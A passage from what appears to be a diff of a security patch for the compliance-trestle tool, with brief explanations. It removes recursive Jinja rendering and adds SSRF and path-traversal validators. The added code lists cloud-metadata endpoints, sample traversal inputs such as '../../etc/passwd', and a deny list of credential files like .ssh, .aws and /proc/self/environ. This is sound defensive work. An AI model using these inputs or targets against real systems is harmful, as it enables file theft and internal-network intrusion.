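    u = parse.urlparse(url)
    if u.scheme not in ('https', 'sftp'):
        raise ValueError('Only HTTPS or SFTP schemes are allowed for remote URLs')
    if not u.hostname:
        raise ValueError(f'URL {url!r} has no hostname')

    infos = socket.getaddrinfo(u.hostname, u.port)
    if not infos:
        raise ValueError(f'No IP addresses resolved for hostname {u.hostname}')

    blocked = ALWAYS_BLOCKED + (PRIVATE if block_private else [])
    addresses = []
    for info in infos:
        # info[4] is the sockaddr tuple; its first element is the address string.
        ip = ipaddress.ip_address(info[4][0])
        for net in blocked:
            if ip.version == net.version and ip in net:
                raise ValueError(f'{ip} is in blocked range {net}')
        addresses.append(str(ip))
    return sorted(set(addresses))
```

Checking every resolved address, not only the first, matters because a hostname can resolve to several records and only one of them needs to point at an internal service. The sketch does not handle IPv4-mapped IPv6 addresses or DNS rebinding between validation and connection.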
    
  • trestle/core/commands/author/jinja.py +26 -33 modified
    @@ -20,16 +20,16 @@
     import operator
     import pathlib
     import re
    -import uuid
     from typing import Any, Dict, Optional
     
    -from jinja2 import ChoiceLoader, DictLoader, Environment, FileSystemLoader, Template
    +from jinja2 import Environment, FileSystemLoader, Template
     
     from ruamel.yaml import YAML
     
     from trestle.common import const, log
     from trestle.common.err import TrestleIncorrectArgsError, handle_generic_command_exception
     from trestle.common.load_validate import load_validate_model_name
    +from trestle.core.remote.security import PathSecurityValidator
     from trestle.common.model_utils import ModelUtils
     from trestle.core.catalog.catalog_interface import CatalogInterface
     from trestle.core.commands.command_docs import CommandPlusDocs
    @@ -48,8 +48,6 @@
     class JinjaCmd(CommandPlusDocs):
         """Transform an input template to an output document using jinja templating."""
     
    -    max_recursion_depth = 2
    -
         name = 'jinja'
     
         def _init_arguments(self) -> None:
    @@ -191,9 +189,7 @@ def jinja_ify(
         ) -> int:
             """Run jinja over an input file with additional booleans."""
             template_folder = pathlib.Path.cwd()
    -        jinja_env = Environment(
    -            loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    -        )
    +        jinja_env = JinjaCmd._create_jinja_environment(template_folder)
             template = jinja_env.get_template(str(r_input_file))
             # create boolean dict
             if operator.xor(bool(ssp), bool(profile)):
    @@ -228,7 +224,10 @@ def jinja_ify(
     
             output = JinjaCmd.render_template(template, lut, template_folder)
     
    +        # Validate output path to prevent path traversal
             output_file = trestle_root / r_output_file
    +        PathSecurityValidator.validate_local_path(output_file, trestle_root)
    +
             if number_captions:
                 output_file.open('w', encoding=const.FILE_ENCODING).write(_number_captions(output))
             else:
    @@ -274,14 +273,15 @@ def jinja_multiple_md(
                     control_path = catalog_interface.get_control_path(control.id)
                     for sub_dir in control_path:
                         group_dir = group_dir / sub_dir
    -                    if not group_dir.exists():
    -                        group_dir.mkdir(parents=True, exist_ok=True)
    +                    # Validate directory path to prevent path traversal before creating directories
    +                    full_group_dir = trestle_root / group_dir
    +                    PathSecurityValidator.validate_local_path(full_group_dir, trestle_root)
    +                    if not full_group_dir.exists():
    +                        full_group_dir.mkdir(parents=True, exist_ok=True)
     
                     control_writer = DocsControlWriter()
     
    -                jinja_env = Environment(
    -                    loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    -                )
    +                jinja_env = JinjaCmd._create_jinja_environment(template_folder)
                     template = jinja_env.get_template(str(r_input_file))
                     lut['catalog_interface'] = catalog_interface
                     lut['control_interface'] = ControlInterface()
    @@ -291,33 +291,26 @@ def jinja_multiple_md(
                     lut['group_title'] = group_title
                     output = JinjaCmd.render_template(template, lut, template_folder)
     
    -                output_file = trestle_root / group_dir / pathlib.Path(control.id + const.MARKDOWN_FILE_EXT)
    +                # Validate output path to prevent path traversal
    +                relative_output_path = group_dir / pathlib.Path(control.id + const.MARKDOWN_FILE_EXT)
    +                output_file = trestle_root / relative_output_path
    +                PathSecurityValidator.validate_local_path(output_file, trestle_root)
    +
                     output_file.open('w', encoding=const.FILE_ENCODING).write(output)
     
             return CmdReturnCodes.SUCCESS.value
     
         @staticmethod
    -    def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
    -        """Render template."""
    -        new_output = template.render(**lut)
    -        output = ''
    -        # This recursion allows nesting within expressions (e.g. an expression can contain jinja templates).
    -        error_countdown = JinjaCmd.max_recursion_depth
    -        while new_output != output and error_countdown > 0:
    -            error_countdown = error_countdown - 1
    -            output = new_output
    -            random_name = uuid.uuid4()  # Should be random and not used.
    -            dict_loader = DictLoader({str(random_name): new_output})
    -            jinja_env = Environment(
    -                loader=ChoiceLoader([dict_loader, FileSystemLoader(template_folder)]),
    -                extensions=extensions(),
    -                autoescape=True,
    -                trim_blocks=True,
    -            )
    -            template = jinja_env.get_template(str(random_name))
    -            new_output = template.render(**lut)
    +    def _create_jinja_environment(template_folder: pathlib.Path) -> Environment:
    +        """Create the trusted Jinja environment used for loading template files."""
    +        return Environment(
    +            loader=FileSystemLoader(template_folder), extensions=extensions(), trim_blocks=True, autoescape=True
    +        )
     
    -        return output
    +    @staticmethod
    +    def render_template(template: Template, lut: Dict[str, Any], template_folder: pathlib.Path) -> str:
    +        """Render a trusted template exactly once to avoid recursive SSTI of untrusted data."""
    +        return template.render(**lut)
     
     
     def _number_captions(md_body: str) -> str:
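
The output-path checks added in this file rely on a resolve-then-compare pattern. Below is a minimal sketch of that pattern, assuming only the standard library; `is_within` is a hypothetical helper and not part of compliance-trestle, whose `PathSecurityValidator.validate_local_path` raises `TrestleError` rather than returning a boolean.

```python
import pathlib
import tempfile


def is_within(candidate: pathlib.Path, root: pathlib.Path) -> bool:
    """Return True if candidate, once resolved, is root itself or lies below it."""
    try:
        # resolve() collapses '..' and follows symlinks before the comparison.
        candidate.resolve().relative_to(root.resolve())
    except ValueError:
        # relative_to() raises ValueError when candidate is not under root.
        return False
    return True


with tempfile.TemporaryDirectory() as tmp:
    workspace = pathlib.Path(tmp) / 'workspace'
    workspace.mkdir()
    inside = is_within(workspace / 'docs' / 'out.md', workspace)
    outside = is_within(workspace / '..' / 'out.md', workspace)
    sibling = is_within(pathlib.Path(tmp) / 'workspace-evil' / 'out.md', workspace)
```

Comparing path components through `relative_to()` avoids the pitfall of a plain string-prefix test, which would accept a sibling directory such as `workspace-evil` because its name starts with `workspace`.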
    
  • trestle/core/remote/cache.py +79 -7 modified
    @@ -41,6 +41,7 @@
     from trestle.common.err import TrestleError
     from trestle.core import parser
     from trestle.core.base_model import OscalBaseModel
    +from trestle.core.remote.security import PathSecurityValidator, URLSecurityValidator, get_block_private_ips_config
     
     logger = logging.getLogger(__name__)
     
    @@ -169,16 +170,29 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """
             super().__init__(trestle_root, uri)
     
    +        original_uri = uri
    +        is_file_uri = uri.startswith(const.FILE_URI)
    +
             # Handle as file:/// form
    -        if uri.startswith(const.FILE_URI):
    +        if is_file_uri:
                 # strip off entire header including /
                 uri = uri[len(const.FILE_URI) :]
     
                 # if it has a drive letter don't add / to front
                 uri = uri if re.match(const.WINDOWS_DRIVE_LETTER_REGEX, uri) else '/' + uri
             elif uri.startswith(const.TRESTLE_HREF_HEADING):
    -            uri = str(trestle_root / uri[len(const.TRESTLE_HREF_HEADING) :])
    +            # Extract the path after 'trestle://'
    +            trestle_path = uri[len(const.TRESTLE_HREF_HEADING) :]
    +
    +            # Layer 1: Validate the trestle:// URI path for traversal sequences
    +            PathSecurityValidator.validate_trestle_uri_path(trestle_path)
    +
    +            uri = str(trestle_root / trestle_path)
                 self._abs_path = pathlib.Path(uri).resolve()
    +
    +            # Layer 2: Validate resolved path stays within trestle workspace
    +            PathSecurityValidator.validate_local_path(self._abs_path, self._trestle_root)
    +
                 self._cached_object_path = self._abs_path
                 return
     
    @@ -199,6 +213,13 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             except Exception:
                 raise TrestleError(f'The uri provided is invalid or unresolvable as a file path: {uri}')
     
    +        # Security validation for file:// URIs and relative paths
    +        # LocalFetcher is designed to access files outside workspace (e.g., test data, external catalogs)
    +        # Security is provided by blocking sensitive system files, not workspace boundaries
    +        # This prevents arbitrary file read vulnerabilities (PT-002) while allowing legitimate use
    +        logger.info(f'Validating local file access: {original_uri}')
    +        PathSecurityValidator.validate_local_file_path(self._trestle_root, self._abs_path, allow_outside_workspace=True)
    +
             # set the cached path to be the actual file path
             self._cached_object_path = self._abs_path
     
    @@ -219,6 +240,14 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """Initialize HTTPS fetcher."""
             logger.debug('Initializing HTTPSFetcher')
             super().__init__(trestle_root, uri)
    +
    +        # Security validation: Check URL for SSRF vulnerabilities
    +        # Always blocks: loopback, link-local, cloud metadata endpoints
    +        # Optionally blocks: RFC 1918 private ranges (based on TRESTLE_BLOCK_PRIVATE_IPS env var)
    +        block_private = get_block_private_ips_config()
    +        self._url_validator = URLSecurityValidator(block_private_ips=block_private)
    +        self._url_validator.validate_url(uri)
    +
             self._username = None
             self._password = None
             u = parse.urlparse(self._uri)
    @@ -262,14 +291,31 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 )
             if u.hostname is None:
                 raise TrestleError(f'Cache request for {self._uri} requires hostname')
    +
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             https_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URI path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URI path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             https_cached_dir = https_cached_dir / path_parent
             https_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = https_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
    +        # Re-validate URL before fetch to prevent DNS rebinding attacks
    +        # This closes the TOCTOU window between init and actual request
    +        self._url_validator.validate_url(self._url)
    +
             auth = None
             verify = None
             # This order reflects requests library behavior: REQUESTS_CA_BUNDLE comes first.
    @@ -313,6 +359,14 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
             """
             logger.debug(f'initialize SFTPFetcher for uri {uri}')
             super().__init__(trestle_root, uri)
    +
    +        # Security validation: Check URL for SSRF vulnerabilities
    +        # Always blocks: loopback, link-local, cloud metadata endpoints
    +        # Optionally blocks: RFC 1918 private ranges (based on TRESTLE_BLOCK_PRIVATE_IPS env var)
    +        block_private = get_block_private_ips_config()
    +        self._url_validator = URLSecurityValidator(block_private_ips=block_private)
    +        self._url_validator.validate_url(uri)
    +
             # Is this a valid URI, however? Username and password are optional, of course.
             try:
                 u = parse.urlparse(self._uri)
    @@ -329,19 +383,35 @@ def __init__(self, trestle_root: pathlib.Path, uri: str) -> None:
                 logger.warning(f'Malformed URI, cannot parse path in URL {self._uri}')
                 raise TrestleError(f'Cache request for invalid input URI: missing file path {self._uri}')
     
    +        # Validate the URL path to prevent path traversal attacks
    +        PathSecurityValidator.validate_url_path_for_cache(u.path)
    +
             sftp_cached_dir = self._trestle_cache_path / u.hostname
    -        # Skip any number of back- or forward slashes preceding the URL path (u.path)
    -        path_parent = pathlib.Path(u.path[re.search('[^/\\\\]', u.path).span()[0] :]).parent
    +
    +        # Skip any number of back- or forward slashes preceding the URL path
    +        match = re.search('[^/\\\\]', u.path)
    +        if match:
    +            path_parent = pathlib.Path(u.path[match.span()[0] :]).parent
    +        else:
    +            path_parent = pathlib.Path('.')
    +
             sftp_cached_dir = sftp_cached_dir / path_parent
             sftp_cached_dir.mkdir(parents=True, exist_ok=True)
             self._cached_object_path = sftp_cached_dir / pathlib.Path(pathlib.Path(u.path).name)
     
    +        # Validate that the resolved cache path stays within the cache directory (defense in depth)
    +        PathSecurityValidator.validate_cache_path(self._cached_object_path, self._trestle_cache_path)
    +
         def _do_fetch(self) -> None:
             """Fetch remote object and update the cache if appropriate and possible to do so.
     
             Authentication relies on the user's private key being either active via ssh-agent or
             supplied via environment variable SSH_KEY. In the latter case, it must not require a passphrase prompt.
             """
    +        # Re-validate URL before fetch to prevent DNS rebinding attacks
    +        # This closes the TOCTOU window between init and actual request
    +        self._url_validator.validate_url(self._uri)
    +
             u = parse.urlparse(self._uri)
             client = paramiko.SSHClient()
             # Must pick up host keys from the default known_hosts on this environment:
    @@ -358,9 +428,11 @@ def _do_fetch(self) -> None:
                 look_for_keys = True
     
             username = getpass.getuser() if not u.username else u.username
    +        # u.hostname is guaranteed to be non-None due to earlier validation
    +        hostname = u.hostname if u.hostname else 'localhost'
             try:
                 client.connect(
    -                u.hostname,
    +                hostname,
                     username=username,
                     password=u.password,
                     pkey=pkey,
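
To see why the cache path derivation needed a guard, the sketch below mirrors the directory construction from the hunks above using pure paths, so nothing touches the filesystem. It is an illustration under stated assumptions: `cache_parent_for`, `normalized` and `has_traversal_segment` are hypothetical names, and the segment-based check is a possible stricter alternative for comparison, not what the patch implements (the patch rejects any URL path containing the substring `..`).

```python
import pathlib
import posixpath
import re
from urllib import parse


def cache_parent_for(cache_root: pathlib.PurePosixPath, uri: str) -> pathlib.PurePosixPath:
    """Mirror the cache directory derivation from the diff, without validation."""
    u = parse.urlparse(uri)
    # Skip leading slashes or backslashes, then take the parent of what remains.
    match = re.search(r'[^/\\]', u.path)
    if match:
        path_parent = pathlib.PurePosixPath(u.path[match.start():]).parent
    else:
        path_parent = pathlib.PurePosixPath('.')
    return cache_root / u.hostname / path_parent


def normalized(path: pathlib.PurePosixPath) -> str:
    """Collapse '..' lexically to show where the directory would really land."""
    return posixpath.normpath(str(path))


def has_traversal_segment(url_path: str) -> bool:
    """Hypothetical alternative: flag '..' only when it is a whole path segment."""
    return '..' in re.split(r'[/\\]', url_path)


root = pathlib.PurePosixPath('/ws/.trestle/cache')
escaped = normalized(cache_parent_for(root, 'https://evil.example/../../../tmp/payload.json'))
benign = normalized(cache_parent_for(root, 'https://example.org/catalogs/nist/catalog.json'))
```

`urlparse` leaves dot segments in the path untouched, so the unvalidated derivation lands three levels above the per-host cache directory. A substring test for `..` is the more conservative choice and also rejects harmless names such as `v1..2`; a segment-based test accepts those but depends on splitting on every separator the platform honors.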
    
  • trestle/core/remote/security.py +470 -0 added
    @@ -0,0 +1,470 @@
    +# -*- mode:python; coding:utf-8 -*-
    +
    +# Copyright (c) 2026 The OSCAL Compass Authors.
    +#
    +# Licensed under the Apache License, Version 2.0 (the "License");
    +# you may not use this file except in compliance with the License.
    +# You may obtain a copy of the License at
    +#
    +#     https://www.apache.org/licenses/LICENSE-2.0
    +#
    +# Unless required by applicable law or agreed to in writing, software
    +# distributed under the License is distributed on an "AS IS" BASIS,
    +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    +# See the License for the specific language governing permissions and
    +# limitations under the License.
    +"""
    +Security validation utilities for remote fetching operations.
    +
    +This module provides security controls to prevent SSRF, path traversal,
    +and arbitrary file access vulnerabilities.
    +"""
    +
    +import ipaddress
    +import logging
    +import os
    +import pathlib
    +import socket
    +from typing import Optional, Set
    +from urllib import parse
    +
    +from trestle.common.err import TrestleError
    +
    +
    +def get_block_private_ips_config() -> bool:
    +    """Get the TRESTLE_BLOCK_PRIVATE_IPS configuration from environment.
    +
    +    Returns:
    +        True if private IPs should be blocked, False otherwise (default).
    +
    +    The environment variable can be set to:
    +    - 'true', '1', 'yes', 'on' (case-insensitive) to enable blocking
    +    - Any other value or unset to disable blocking (allow private IPs)
    +    """
    +    env_value = os.environ.get('TRESTLE_BLOCK_PRIVATE_IPS', '').lower()
    +    return env_value in ('true', '1', 'yes', 'on')
    +
    +
    +logger = logging.getLogger(__name__)
    +
    +# Always blocked - zero legitimate use for OSCAL fetching
    +# These ranges are blocked regardless of configuration
    +ALWAYS_BLOCKED_NETWORKS = [
    +    ipaddress.ip_network('127.0.0.0/8'),  # Loopback
    +    ipaddress.ip_network('::1/128'),  # IPv6 loopback
    +    ipaddress.ip_network('169.254.0.0/16'),  # Link-local (includes metadata endpoints)
    +    ipaddress.ip_network('fe80::/10'),  # IPv6 link-local
    +]
    +
    +# RFC 1918 private ranges - optionally blocked based on configuration
    +# These are allowed by default to support private GitLab/internal OSCAL repositories
    +PRIVATE_IP_NETWORKS = [
    +    ipaddress.ip_network('10.0.0.0/8'),
    +    ipaddress.ip_network('172.16.0.0/12'),
    +    ipaddress.ip_network('192.168.0.0/16'),
    +    ipaddress.ip_network('fc00::/7'),  # IPv6 unique local
    +]
    +
    +# Cloud metadata endpoints that should be blocked
    +# These are always blocked regardless of configuration
    +METADATA_HOSTNAMES = {
    +    '169.254.169.254',  # AWS, Azure, GCP
    +    'metadata.google.internal',  # GCP
    +    'metadata.azure.com',  # Azure (alternative)
    +    '100.100.100.200',  # Alibaba Cloud
    +}
    +
    +
    +class URLSecurityValidator:
    +    """Validates URLs to prevent SSRF attacks.
    +
    +    Implements two-tiered SSRF protection:
    +    1. Always blocked: loopback, link-local, and cloud metadata endpoints
    +    2. Optionally blocked: RFC 1918 private ranges (configurable via block_private_ips)
    +    """
    +
    +    def __init__(self, block_private_ips: bool = False, allowed_domains: Optional[Set[str]] = None):
    +        """Initialize URL security validator.
    +
    +        Args:
    +            block_private_ips: If True, block RFC 1918 private IP ranges (default: False).
    +                              Always-blocked ranges (loopback, link-local, metadata) are blocked regardless.
    +            allowed_domains: Optional set of allowed domain names. If provided, only these domains are allowed.
    +        """
    +        self.block_private_ips = block_private_ips
    +        self.allowed_domains = allowed_domains
    +
    +    def validate_url(self, url: str) -> None:
    +        """Validate a URL for security issues.
    +
    +        This method resolves the hostname and validates all resolved IPs to prevent SSRF attacks.
    +
    +        To mitigate DNS rebinding attacks, this validation is called both at initialization and
    +        immediately before each fetch operation, minimizing the TOCTOU window.
    +
    +        Args:
    +            url: The URL to validate
    +
    +        Raises:
    +            TrestleError: If the URL is deemed unsafe
    +        """
    +        parsed = self._parse_and_validate_url(url)
    +        # hostname is guaranteed to be non-None by _parse_and_validate_url
    +        hostname = parsed.hostname.lower()  # type: ignore
    +
    +        self._check_metadata_endpoints(hostname)
    +        self._check_domain_allowlist(hostname)
    +
    +        ip_addresses = self._resolve_hostname(hostname)
    +
    +        for ip_str in ip_addresses:
    +            ip_addr = self._parse_ip_address(ip_str, hostname)
    +            self._check_blocked_networks(ip_addr, hostname)
    +            self._check_private_networks(ip_addr, hostname)
    +
    +        self._check_suspicious_ports(parsed, url)
    +
    +    def _parse_and_validate_url(self, url: str) -> parse.ParseResult:
    +        """Parse and validate basic URL structure."""
    +        try:
    +            parsed = parse.urlparse(url)
    +        except Exception as e:
    +            raise TrestleError(f'Invalid URL format: {url}') from e
    +
    +        if not parsed.scheme or not parsed.hostname:
    +            raise TrestleError(f'URL must include scheme and hostname: {url}')
    +
    +        if parsed.scheme not in ['https', 'sftp']:
    +            raise TrestleError(f'Only HTTPS or SFTP schemes are allowed for remote URLs, got: {parsed.scheme}')
    +
    +        return parsed
    +
    +    def _check_metadata_endpoints(self, hostname: str) -> None:
    +        """Check if hostname is a blocked metadata endpoint."""
    +        if hostname in METADATA_HOSTNAMES:
    +            raise TrestleError(
    +                f'Access to cloud metadata endpoints is not allowed: {hostname}. '
    +                'This is a security restriction to prevent SSRF attacks.'
    +            )
    +
    +    def _check_domain_allowlist(self, hostname: str) -> None:
    +        """Check if hostname is in the allowed domains list."""
    +        if self.allowed_domains is not None:
    +            if hostname not in self.allowed_domains:
    +                raise TrestleError(
    +                    f'Domain {hostname} is not in the allowed domains list. '
    +                    f'Allowed domains: {", ".join(sorted(self.allowed_domains))}'
    +                )
    +
    +    def _resolve_hostname(self, hostname: str) -> list:
    +        """Resolve hostname to IP addresses."""
    +        try:
    +            addr_info = socket.getaddrinfo(hostname, None)
    +            ip_addresses = [str(info[4][0]) for info in addr_info]
    +        except socket.gaierror as e:
    +            raise TrestleError(f'Unable to resolve hostname {hostname}: {e}') from e
    +
    +        if not ip_addresses:
    +            raise TrestleError(f'No IP addresses resolved for hostname {hostname}')
    +
    +        return ip_addresses
    +
    +    def _parse_ip_address(self, ip_str: str, hostname: str) -> ipaddress.IPv4Address | ipaddress.IPv6Address:
    +        """Parse IP address string."""
    +        try:
    +            return ipaddress.ip_address(ip_str)
    +        except ValueError as e:
    +            raise TrestleError(f'Invalid IP address {ip_str} for hostname {hostname}: {e}') from e
    +
    +    def _check_blocked_networks(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Check if IP is in always-blocked networks (Tier 1)."""
    +        for network in ALWAYS_BLOCKED_NETWORKS:
    +            if ip_addr in network:
    +                raise TrestleError(
    +                    f'Access to {network} addresses is blocked: {hostname} resolves to {ip_addr}. '
    +                    f'This range includes loopback, link-local, and cloud metadata endpoints. '
    +                    f'This is a security restriction to prevent SSRF attacks.'
    +                )
    +
    +    def _check_private_networks(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Check if IP is in private networks (Tier 2)."""
    +        if self.block_private_ips:
    +            self._block_private_ip(ip_addr, hostname)
    +        else:
    +            self._warn_private_ip(ip_addr, hostname)
    +
    +    def _block_private_ip(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Block access to private IP addresses when configured."""
    +        for network in PRIVATE_IP_NETWORKS:
    +            if ip_addr in network:
    +                raise TrestleError(
    +                    f'Access to private IP addresses is blocked: {hostname} resolves to {ip_addr} '
    +                    f'which is in private network {network}. '
    +                    f'This is blocked because TRESTLE_BLOCK_PRIVATE_IPS is enabled. '
    +                    f'To allow access to private networks, unset this environment variable.'
    +                )
    +
    +    def _warn_private_ip(self, ip_addr: ipaddress.IPv4Address | ipaddress.IPv6Address, hostname: str) -> None:
    +        """Log warning when accessing private IP addresses."""
    +        for network in PRIVATE_IP_NETWORKS:
    +            if ip_addr in network:
    +                logger.warning(
    +                    f'Accessing private IP address: {hostname} resolves to {ip_addr} in network {network}. '
    +                    f'This is allowed by default to support private GitLab/internal OSCAL repositories. '
    +                    f'To block private IPs, set TRESTLE_BLOCK_PRIVATE_IPS=true.'
    +                )
    +                break  # Only log once per IP
    +
    +    def _check_suspicious_ports(self, parsed: parse.ParseResult, url: str) -> None:
    +        """Check for non-standard ports."""
    +        if parsed.port is not None:
    +            if (
    +                parsed.scheme == 'https'
    +                and parsed.port not in [443]
    +                or parsed.scheme == 'sftp'
    +                and parsed.port not in [22]
    +            ):
    +                logger.warning(
    +                    f'Non-standard port {parsed.port} detected in URL {url}. This may indicate a security risk.'
    +                )
    +
    +
    +class PathSecurityValidator:
    +    """Validator for ensuring file paths remain within allowed boundaries."""
    +
    +    @staticmethod
    +    def validate_url_path_for_cache(url_path: str) -> None:
    +        """
    +        Validate a URL path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) and raises an exception to block the attack.
    +        This prevents directory traversal attacks when constructing cache file paths.
    +
    +        Args:
    +            url_path: The path component from a URL (e.g., from urlparse().path)
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/normal/path.json')  # No exception
    +            >>> PathSecurityValidator.validate_url_path_for_cache('/../../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in url_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'URL path "{url_path}" contains ".." sequences which could '
    +                f'allow writing files outside the cache directory.'
    +            )
    +
    +    @staticmethod
    +    def validate_cache_path(cache_path: pathlib.Path, cache_root: pathlib.Path) -> None:
    +        """
    +        Validate that a cache file path stays within the cache directory.
    +
    +        Uses path resolution and relative_to() to ensure the resolved cache path
    +        is actually within the cache root directory, preventing path traversal attacks.
    +
    +        Args:
    +            cache_path: The proposed cache file path to validate
    +            cache_root: The root cache directory that must contain the cache_path
    +
    +        Raises:
    +            TrestleError: If cache_path resolves outside cache_root
    +
    +        Example:
    +            >>> cache_root = pathlib.Path('/home/user/.trestle/cache')
    +            >>> cache_path = cache_root / 'evil.com' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_cache_path(cache_path, cache_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_cache = cache_path.resolve()
    +        resolved_root = cache_root.resolve()
    +
    +        try:
    +            # Check if cache path is relative to (within) cache root
    +            resolved_cache.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Cache path traversal blocked. '
    +                f'Attempted to write to "{resolved_cache}" which is outside '
    +                f'the cache directory "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating cache path "{cache_path}": {e}') from e
    +
    +    @staticmethod
    +    def validate_trestle_uri_path(uri_path: str) -> None:
    +        """
    +        Validate a trestle:// URI path component to prevent path traversal attacks.
    +
    +        Detects path traversal attempts (..) in trestle:// URIs and raises an exception.
    +        This prevents directory traversal when resolving trestle:// references.
    +
    +        Args:
    +            uri_path: The path component after 'trestle://' prefix
    +
    +        Raises:
    +            TrestleError: If path contains traversal sequences (..)
    +
    +        Example:
    +            >>> PathSecurityValidator.validate_trestle_uri_path('catalogs/nist/catalog.json')  # No exception
    +            >>> PathSecurityValidator.validate_trestle_uri_path('../../etc/passwd')  # Raises TrestleError
    +        """
    +        # Check for path traversal sequences
    +        if '..' in uri_path:
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked in trestle:// URI. '
    +                f'URI path "{uri_path}" contains ".." sequences which could '
    +                f'allow reading files outside the trestle workspace.'
    +            )
    +
    +    @staticmethod
    +    def validate_local_path(local_path: pathlib.Path, trestle_root: pathlib.Path) -> None:
    +        """
    +        Validate that a local file path stays within the trestle workspace.
    +
    +        Uses path resolution and is_relative_to() to ensure the resolved local path
    +        is actually within the trestle root directory, preventing path traversal attacks.
    +
    +        Args:
    +            local_path: The proposed local file path to validate
    +            trestle_root: The trestle root directory that must contain the local_path
    +
    +        Raises:
    +            TrestleError: If local_path resolves outside trestle_root
    +
    +        Example:
    +            >>> trestle_root = pathlib.Path('/home/user/trestle-workspace')
    +            >>> local_path = trestle_root / 'catalogs' / '..' / '..' / 'etc' / 'passwd'
    +            >>> validate_local_path(local_path, trestle_root)  # Raises TrestleError
    +        """
    +        # Resolve both paths to absolute, normalized paths
    +        resolved_local = local_path.resolve()
    +        resolved_root = trestle_root.resolve()
    +
    +        try:
    +            # Check if local path is relative to (within) trestle root
    +            resolved_local.relative_to(resolved_root)
    +
    +        except ValueError as e:
    +            # relative_to() raises ValueError if path is not relative to root
    +            raise TrestleError(
    +                f'Security violation: Path traversal blocked. '
    +                f'Attempted to access "{resolved_local}" which is outside '
    +                f'the trestle workspace "{resolved_root}"'
    +            ) from e
    +        except Exception as e:
    +            raise TrestleError(f'Error validating local path "{local_path}": {e}') from e
    +
    +    @staticmethod
    +    def validate_local_file_path(
    +        workspace_root: pathlib.Path, file_path: pathlib.Path, allow_outside_workspace: bool = False
    +    ) -> None:
    +        """Validate that a local file path is safe to access.
    +
    +        This method provides defense-in-depth protection against arbitrary file access
    +        by validating both workspace boundaries and blocking known sensitive system files.
    +
    +        Args:
    +            workspace_root: The trestle workspace root directory
    +            file_path: The file path to validate
    +            allow_outside_workspace: If True, allow access to files outside workspace (default: False)
    +
    +        Raises:
    +            TrestleError: If the path is deemed unsafe
    +
    +        Example:
    +            >>> workspace = pathlib.Path('/home/user/trestle-workspace')
    +            >>> file_path = pathlib.Path('/etc/passwd')
    +            >>> validate_local_file_path(workspace, file_path, allow_outside_workspace=False)
    +            # Raises TrestleError: Access to files outside workspace not allowed
    +            >>> validate_local_file_path(workspace, file_path, allow_outside_workspace=True)
    +            # Raises TrestleError: Attempt to access sensitive system file
    +        """
    +        resolved_workspace = workspace_root.resolve()
    +        resolved_file = file_path.resolve()
    +
    +        try:
    +            if not allow_outside_workspace:
    +                # Ensure file is within workspace
    +                resolved_file.relative_to(resolved_workspace)
    +        except ValueError as e:
    +            if not allow_outside_workspace:
    +                raise TrestleError(
    +                    f'Access to files outside the trestle workspace is not allowed: {file_path}. '
    +                    'This is a security restriction to prevent arbitrary file access.'
    +                ) from e
    +
    +        # Additional checks for sensitive system files
    +        # This provides defense-in-depth even when allow_outside_workspace=True
    +        # Comprehensive list covering Linux, macOS, and Windows
    +        sensitive_paths = [
    +            # Linux/Unix system files
    +            '/etc/passwd',
    +            '/etc/shadow',
    +            '/etc/group',
    +            '/etc/gshadow',
    +            '/etc/sudoers',
    +            '/etc/hosts',
    +            '/etc/ssh',
    +            '/etc/ssl',
    +            '/etc/pki',
    +            '/etc/security',
    +            '/proc/self/environ',
    +            '/proc/self/cmdline',
    +            '/proc/self/maps',
    +            '/sys/class/net',
    +            # User credential files (Linux/macOS)
    +            '/.ssh',
    +            '/.aws',
    +            '/.gnupg',
    +            '/.docker',
    +            '/.kube',
    +            '/.config/gcloud',
    +            '/root/.ssh',
    +            '/root/.aws',
    +            '/root/.gnupg',
    +            # macOS specific
    +            '/Library/Keychains',
    +            '/Library/',  # Broad but catches user home directories
    +            # Windows system directories
    +            'C:\\Windows\\System32',
    +            'C:\\Windows\\SysWOW64',
    +            'C:\\Windows\\System',
    +            'C:\\Windows\\security',
    +            'C:\\ProgramData\\Microsoft\\Crypto',
    +            # Windows credential files
    +            '\\AppData\\Local\\Microsoft\\Credentials',
